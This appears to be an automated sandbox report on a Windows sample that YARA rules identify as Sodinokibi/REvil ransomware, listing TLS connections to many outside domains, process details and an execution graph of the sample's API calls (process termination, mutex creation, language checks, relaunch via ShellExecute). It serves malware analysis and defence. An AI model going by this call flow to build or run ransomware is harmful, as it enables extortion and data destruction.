                                                                                                                                                          Feb 16, 2021 04:31:58.446204901 CET52.29.252.113443192.168.2.349771CN=gemeentehetkompas.nl CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Jan 09 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Sat Apr 10 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                          CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:31:59.854739904 CET178.250.15.192443192.168.2.349772CN=daklesa.de CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue May 05 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019 Thu Jan 01 01:00:00 CET 2004Mon May 23 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                                                                          CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                          Feb 16, 2021 04:32:00.257339954 CET155.133.142.13443192.168.2.349773CN=pierrehale.com CN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FRCN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FR CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USThu Sep 17 02:00:00 CEST 2020 Fri Sep 12 02:00:00 CEST 2014Sun Oct 17 01:59:59 CEST 2021 Thu Sep 12 01:59:59 CEST 2024771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Gandi Standard SSL CA 2, O=Gandi, L=Paris, ST=Paris, C=FRCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Sep 12 02:00:00 CEST 2014Thu Sep 12 01:59:59 CEST 2024
                                                                                                                                                          Feb 16, 2021 04:32:01.208339930 CET104.21.9.188443192.168.2.349774CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEWed Jul 29 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Thu Jul 29 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:01.617275000 CET104.26.13.9443192.168.2.349775CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEFri Jul 17 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Sat Jul 17 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:02.616962910 CET142.93.110.250443192.168.2.349776CN=thewellnessmimi.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Wed Jan 06 09:15:01 CET 2021 Wed Oct 07 21:21:40 CEST 2020Tue Apr 06 10:15:01 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:03.170119047 CET46.30.215.215443192.168.2.349777CN=*.huehnerauge-entfernen.de CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Feb 05 00:49:53 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu May 06 01:49:53 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:05.679265976 CET172.67.222.33443192.168.2.349778CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jul 07 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Wed Jul 07 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                                                                                                                                          Feb 16, 2021 04:32:06.849010944 CET116.90.53.15443192.168.2.349779CN=cosmeticsbysia.com.au CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Jan 29 22:40:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020Thu Apr 29 23:40:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:08.127417088 CET116.90.53.15443192.168.2.349780CN=www.youbysia.you-bysia.com.au CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 03 19:19:29 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 03 20:19:29 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:10.456650019 CET85.119.82.125443192.168.2.349781CN=www.kmbshipping.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Dec 25 06:00:09 CET 2020 Wed Oct 07 21:21:40 CEST 2020Thu Mar 25 06:00:09 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:10.833622932 CET85.119.82.125443192.168.2.349782CN=www.kmbshipping.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Dec 25 06:00:09 CET 2020 Wed Oct 07 21:21:40 CEST 2020Thu Mar 25 06:00:09 CET 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                          Feb 16, 2021 04:32:11.213845015 CET91.121.58.131443192.168.2.349783CN=idemblogs.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sun Jan 17 11:46:09 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sat Apr 17 12:46:09 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                          CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          CPU Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          Memory Usage

                                                                                                                                                          Click to jump to process

                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          Analysis Process: tS9P6wPz9x.exe PID: 2844 Parent PID: 5748

                                                                                                                                                          General

                                                                                                                                                          Start time:04:29:26
                                                                                                                                                          Start date:16/02/2021
                                                                                                                                                          Path:C:\Users\user\Desktop\tS9P6wPz9x.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\user\Desktop\tS9P6wPz9x.exe'
                                                                                                                                                          Imagebase:0x9c0000
                                                                                                                                                          File size:120832 bytes
                                                                                                                                                          MD5 hash:39D22B8F3DA4A83CD957F324F2423309
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmp, Author: Florian Roth
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204328055.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204654521.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204504022.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: MAL_RANSOM_REvil_Oct20_1, Description: Detects REvil ransomware, Source: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, Author: Florian Roth
                                                                                                                                                          • Rule: JoeSecurity_Sodinokibi, Description: Yara detected Sodinokibi Ransomware, Source: 00000000.00000003.204445658.0000000002DB9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low

                                                                                                                                                          Chronological Activities

                                                                                                                                                          Analysis Process: unsecapp.exe PID: 6192 Parent PID: 792

                                                                                                                                                          General

                                                                                                                                                          Start time:04:30:42
                                                                                                                                                          Start date:16/02/2021
                                                                                                                                                          Path:C:\Windows\System32\wbem\unsecapp.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                                                          Imagebase:0x7ff718cf0000
                                                                                                                                                          File size:48640 bytes
                                                                                                                                                          MD5 hash:9CBD3EC8D9E4F8CE54258B0573C66BEB
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          Chronological Activities

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >

                                                                                                                                                            Analysis Process: tS9P6wPz9x.exe PID: 2844 Parent PID: 5748 tS9P6wPz9x.exeCOMMON

                                                                                                                                                            Execution Graph

                                                                                                                                                            Execution Coverage:28.7%
                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                            Signature Coverage:11.8%
                                                                                                                                                            Total number of Nodes:1140
                                                                                                                                                            Total number of Limit Nodes:11

                                                                                                                                                            Graph

                                                                                                                                                            execution_graph 5369 9c2c7d 5370 9c1db3 21 API calls 5369->5370 5371 9c2c8d 5370->5371 5377 9c2ccb 5371->5377 5380 9c3cec 5371->5380 5373 9c2c9d 5379 9c2cbe 5373->5379 5394 9c7d44 5373->5394 5374 9c47f8 RtlFreeHeap 5374->5377 5378 9c47f8 RtlFreeHeap 5378->5379 5379->5374 5379->5377 5381 9c3cfe 5380->5381 5382 9c47ab 3 API calls 5381->5382 5384 9c3d0b 5382->5384 5383 9c411b 5383->5373 5384->5383 5385 9c544b 9 API calls 5384->5385 5386 9c3eaa 5385->5386 5387 9c544b 9 API calls 5386->5387 5388 9c403e 5387->5388 5389 9c544b 9 API calls 5388->5389 5390 9c4060 5389->5390 5391 9c40a2 5390->5391 5392 9c544b 9 API calls 5390->5392 5393 9c544b 9 API calls 5391->5393 5392->5390 5393->5383 5396 9c7d6c 5394->5396 5395 9c2cb6 5395->5378 5396->5395 5397 9c7ec8 RtlGetLastWin32Error 5396->5397 5398 9c7ef6 5396->5398 5397->5396 5398->5395 5400 9c7c5d 5398->5400 5402 9c7c79 5400->5402 5401 9c7cd6 5404 9c7d2f 5401->5404 5405 9c47ab 3 API calls 5401->5405 5402->5401 5403 9c47ab 3 API calls 5402->5403 5402->5404 5406 9c47f8 RtlFreeHeap 5402->5406 5403->5402 5404->5395 5407 9c7d07 5405->5407 5406->5402 5407->5404 5408 9c47f8 RtlFreeHeap 5407->5408 5408->5404 4016 9c2799 4018 9c290d 4016->4018 4020 9c27ae 4016->4020 4017 9c27ee VariantClear 4017->4020 4019 9c28f9 VariantClear 4019->4020 4020->4017 4020->4018 4020->4019 4021 9c2891 VariantClear 4020->4021 4022 9c28d9 StrToIntW VariantClear 4020->4022 4023 9c28f2 4020->4023 4021->4020 4022->4020 4023->4019 4025 9c41bb OpenProcess 4023->4025 4026 9c41e1 4025->4026 4027 9c41d2 TerminateProcess 4025->4027 4026->4023 4029 9c4b21 4027->4029 4030 9c4b2a FindCloseChangeNotification 4029->4030 4031 9c4b33 4029->4031 4030->4031 4031->4026 5314 9c6ed9 5315 9c6ef6 5314->5315 5316 9c707d 13 API calls 5315->5316 5317 9c6f0b 5316->5317 5318 9c1019 5319 9c5c8c 6 API calls 5318->5319 5320 9c1024 5319->5320 5321 9c47ab 3 API calls 5320->5321 5322 9c103a 5320->5322 5321->5322 4120 9c4274 4125 9c41e5 4120->4125 4122 9c427b 4147 9c4bba ExitProcess 4122->4147 4126 9c41eb 4125->4126 4148 9c14fd 4126->4148 4129 9c4212 SetErrorMode 4222 9c5387 GetPEB 4129->4222 4133 9c4203 4133->4129 4292 9c4bba ExitProcess 4133->4292 4135 9c421f 4136 9c4229 SHTestTokenMembership 4135->4136 4137 9c4232 4135->4137 4136->4137 4138 9c425c 4137->4138 4223 9c520f 4137->4223 4253 9c37c6 GetCurrentProcess SetPriorityClass SetThreadExecutionState 4138->4253 4142 9c4269 4142->4122 4143 9c425f 4229 9c592c GetCurrentProcess 4143->4229 4144 9c4243 MessageBoxW 4228 9c4bba ExitProcess 4144->4228 4293 9c1c31 4148->4293 4150 9c1561 4150->4129 4150->4133 4282 9c513f 4150->4282 4151 9c150c 4151->4150 4298 9cb82a 4151->4298 4154 9c155b 4155 9c47f8 RtlFreeHeap 4154->4155 4155->4150 4156 9c1569 4304 9c66e3 4156->4304 4161 9c47f8 RtlFreeHeap 4162 9c18d3 4161->4162 4162->4150 4317 9c2289 4162->4317 4164 9c18e3 4367 9c5d3f CryptBinaryToStringW 4164->4367 4169 9c196c 4387 9c1c83 4169->4387 4175 9c1993 4413 9c4bc8 4175->4413 4177 9c6202 3 API calls 4177->4175 4179 9c19b0 4421 9c4d34 4179->4421 4180 9c6202 3 API calls 4180->4179 4183 9c19cd 4432 9c4e50 4183->4432 4184 9c6202 3 API calls 4184->4183 4187 9c19ea 4189 9c513f 8 API calls 4187->4189 4188 9c6202 3 API calls 4188->4187 4190 9c19f5 4189->4190 4191 9c6202 3 API calls 4190->4191 4192 9c1a09 4191->4192 4438 9c4fe9 4192->4438 4195 9c1a26 4444 9c4c0d 4195->4444 4196 9c6202 3 API calls 4196->4195 4199 9c5d3f 6 API calls 4200 9c1a44 4199->4200 4201 9c47f8 RtlFreeHeap 4200->4201 4202 9c1a4f 4201->4202 4450 9c5262 GetNativeSystemInfo 4202->4450 4204 9c1a54 4451 9c2113 4204->4451 4210 9c1a72 4483 9c13c3 4210->4483 4213 9c13c3 3 API calls 4214 9c1b12 4213->4214 4215 9c13c3 3 API calls 4214->4215 4216 9c1b28 4215->4216 4217 9c13c3 3 API calls 4216->4217 4218 9c1b39 4217->4218 4219 9c13c3 3 API calls 4218->4219 4220 9c1b6d 4219->4220 4221 9c13c3 3 API calls 4220->4221 4221->4150 4222->4135 4224 9c522d CreateMutexW 4223->4224 4720 9c5de2 4223->4720 4226 9c524d RtlGetLastWin32Error 4224->4226 4227 9c423f 4224->4227 4226->4227 4227->4143 4227->4144 4722 9c5387 GetPEB 4229->4722 4231 9c5940 4232 9c5a1c 4231->4232 4723 9c4ceb OpenProcessToken 4231->4723 4232->4138 4237 9c5970 4733 9c5628 ReleaseMutex 4237->4733 4242 9c598b ExitProcess 4243 9c5992 4745 9c5294 4243->4745 4245 9c5997 4246 9c59b0 GetForegroundWindow 4245->4246 4247 9c59f7 ShellExecuteExW 4246->4247 4247->4247 4248 9c5a05 4247->4248 4249 9c47f8 RtlFreeHeap 4248->4249 4250 9c5a0b 4249->4250 4251 9c47f8 RtlFreeHeap 4250->4251 4252 9c5a11 ExitProcess 4251->4252 4252->4232 4757 9c2b9c 4253->4757 4258 9c37ff CreateThread 4259 9c4b21 FindCloseChangeNotification 4258->4259 5302 9c3989 4258->5302 4261 9c3815 4259->4261 4260 9c532c 2 API calls 4262 9c3849 4260->4262 4772 9c3b8e OpenSCManagerW 4261->4772 4798 9c32de 4262->4798 4266 9c3886 SetThreadExecutionState 4857 9c1412 4266->4857 4272 9c4b21 FindCloseChangeNotification 4275 9c3841 4272->4275 4275->4260 4276 9c4ec6 5 API calls 4277 9c38a0 4276->4277 4279 9c38a8 MoveFileExW 4277->4279 4280 9c38b8 4277->4280 4278 9c3870 4278->4266 4281 9c47f8 RtlFreeHeap 4279->4281 4280->4142 4281->4280 5312 9c4860 GetUserDefaultUILanguage GetSystemDefaultUILanguage 4282->5312 4285 9c515e 4287 9c47ab 3 API calls 4285->4287 4286 9c51a3 4286->4133 4288 9c5169 4287->4288 4288->4286 4289 9c5170 GetKeyboardLayoutList 4288->4289 4291 9c517c 4289->4291 4290 9c47f8 RtlFreeHeap 4290->4286 4291->4286 4291->4290 4294 9c1c45 4293->4294 4295 9c1c50 4294->4295 4488 9c47ab 4294->4488 4295->4151 4297 9c1c60 4297->4151 4303 9cb844 4298->4303 4299 9cc439 4300 9c1552 4299->4300 4301 9cc474 RtlFreeHeap 4299->4301 4300->4154 4300->4156 4301->4300 4302 9cc51f RtlAllocateHeap HeapCreate GetProcessHeap 4302->4303 4303->4299 4303->4300 4303->4302 4305 9c18be 4304->4305 4306 9c66f6 4304->4306 4313 9cc474 4305->4313 4306->4305 4497 9c132c 4306->4497 4501 9c1156 4306->4501 4504 9c1116 4306->4504 4511 9c1296 4306->4511 4516 9c12fa 4306->4516 4521 9c12c8 4306->4521 4314 9cc47f 4313->4314 4315 9c18cd 4313->4315 4314->4315 4316 9c47f8 RtlFreeHeap 4314->4316 4315->4161 4316->4314 4318 9c22b0 4317->4318 4579 9c550a RegOpenKeyExW 4318->4579 4321 9c2363 4322 9c550a 8 API calls 4321->4322 4324 9c2382 4322->4324 4323 9c550a 8 API calls 4323->4321 4325 9c23a7 4324->4325 4326 9c550a 8 API calls 4324->4326 4327 9c550a 8 API calls 4325->4327 4326->4325 4328 9c23cc 4327->4328 4329 9c23ee 4328->4329 4330 9c550a 8 API calls 4328->4330 4331 9c550a 8 API calls 4329->4331 4330->4329 4332 9c2410 4331->4332 4333 9c2436 4332->4333 4334 9c550a 8 API calls 4332->4334 4348 9c247d 4333->4348 4590 9c6776 4333->4590 4334->4333 4336 9c24cb 4593 9c6b67 4336->4593 4338 9c24ea 4339 9c6b67 12 API calls 4338->4339 4341 9c2502 4339->4341 4340 9c268c 4340->4164 4341->4340 4601 9c5588 RegCreateKeyExW 4341->4601 4344 9c2586 4346 9c5588 3 API calls 4344->4346 4345 9c5588 3 API calls 4345->4344 4347 9c25a8 4346->4347 4349 9c25ce 4347->4349 4352 9c5588 3 API calls 4347->4352 4351 9c2666 4348->4351 4355 9c47f8 RtlFreeHeap 4348->4355 4350 9c5588 3 API calls 4349->4350 4354 9c25ec 4350->4354 4353 9c2674 4351->4353 4356 9c47f8 RtlFreeHeap 4351->4356 4352->4349 4358 9c47f8 RtlFreeHeap 4353->4358 4357 9c260e 4354->4357 4359 9c5588 3 API calls 4354->4359 4355->4351 4356->4353 4361 9c5588 3 API calls 4357->4361 4360 9c267b 4358->4360 4359->4357 4362 9c47f8 RtlFreeHeap 4360->4362 4363 9c2630 4361->4363 4364 9c2681 4362->4364 4363->4348 4366 9c5588 3 API calls 4363->4366 4365 9c5d3f 6 API calls 4364->4365 4365->4340 4366->4348 4368 9c5d6a 4367->4368 4374 9c194d 4367->4374 4369 9c47ab 3 API calls 4368->4369 4370 9c5d76 4369->4370 4371 9c5d7d CryptBinaryToStringW 4370->4371 4370->4374 4372 9c5d93 4371->4372 4371->4374 4373 9c47f8 RtlFreeHeap 4372->4373 4373->4374 4375 9c4f25 4374->4375 4376 9c47ab 3 API calls 4375->4376 4377 9c4f33 4376->4377 4378 9c195a 4377->4378 4641 9c569b 4377->4641 4378->4169 4382 9c6202 4378->4382 4380 9c4f40 4381 9c4f9f wsprintfW 4380->4381 4381->4378 4383 9c620f 4382->4383 4384 9c620b 4382->4384 4385 9c47ab 3 API calls 4383->4385 4384->4169 4386 9c6225 4385->4386 4386->4169 4388 9c1ca4 4387->4388 4389 9c550a 8 API calls 4388->4389 4390 9c1cdd 4389->4390 4391 9c1d06 4390->4391 4392 9c550a 8 API calls 4390->4392 4393 9c1d23 4391->4393 4395 9c47f8 RtlFreeHeap 4391->4395 4405 9c1d9b 4391->4405 4392->4391 4656 9c269a 4393->4656 4395->4393 4397 9c1977 4406 9c505f 4397->4406 4398 9c1d5b 4401 9c5588 3 API calls 4398->4401 4399 9c1d2d 4399->4397 4399->4398 4400 9c47f8 RtlFreeHeap 4399->4400 4402 9c269a 12 API calls 4399->4402 4400->4399 4403 9c1d80 4401->4403 4402->4399 4404 9c5588 3 API calls 4403->4404 4403->4405 4404->4405 4664 9c6603 4405->4664 4407 9c47ab 3 API calls 4406->4407 4408 9c506e 4407->4408 4409 9c5075 GetUserNameW 4408->4409 4410 9c1981 4408->4410 4409->4410 4411 9c508b 4409->4411 4410->4175 4410->4177 4412 9c47f8 RtlFreeHeap 4411->4412 4412->4410 4414 9c47ab 3 API calls 4413->4414 4415 9c4bd4 4414->4415 4416 9c199e 4415->4416 4417 9c4bdb GetComputerNameW 4415->4417 4416->4179 4416->4180 4418 9c4bf7 4417->4418 4419 9c4bf1 4417->4419 4418->4416 4420 9c47f8 RtlFreeHeap 4419->4420 4420->4418 4422 9c4d5b 4421->4422 4423 9c550a 8 API calls 4422->4423 4424 9c4d9c 4423->4424 4425 9c4daf 4424->4425 4427 9c4db8 4424->4427 4431 9c19bb 4424->4431 4426 9c47f8 RtlFreeHeap 4425->4426 4426->4431 4428 9c47f8 RtlFreeHeap 4427->4428 4427->4431 4429 9c4ddc 4428->4429 4430 9c6202 3 API calls 4429->4430 4430->4431 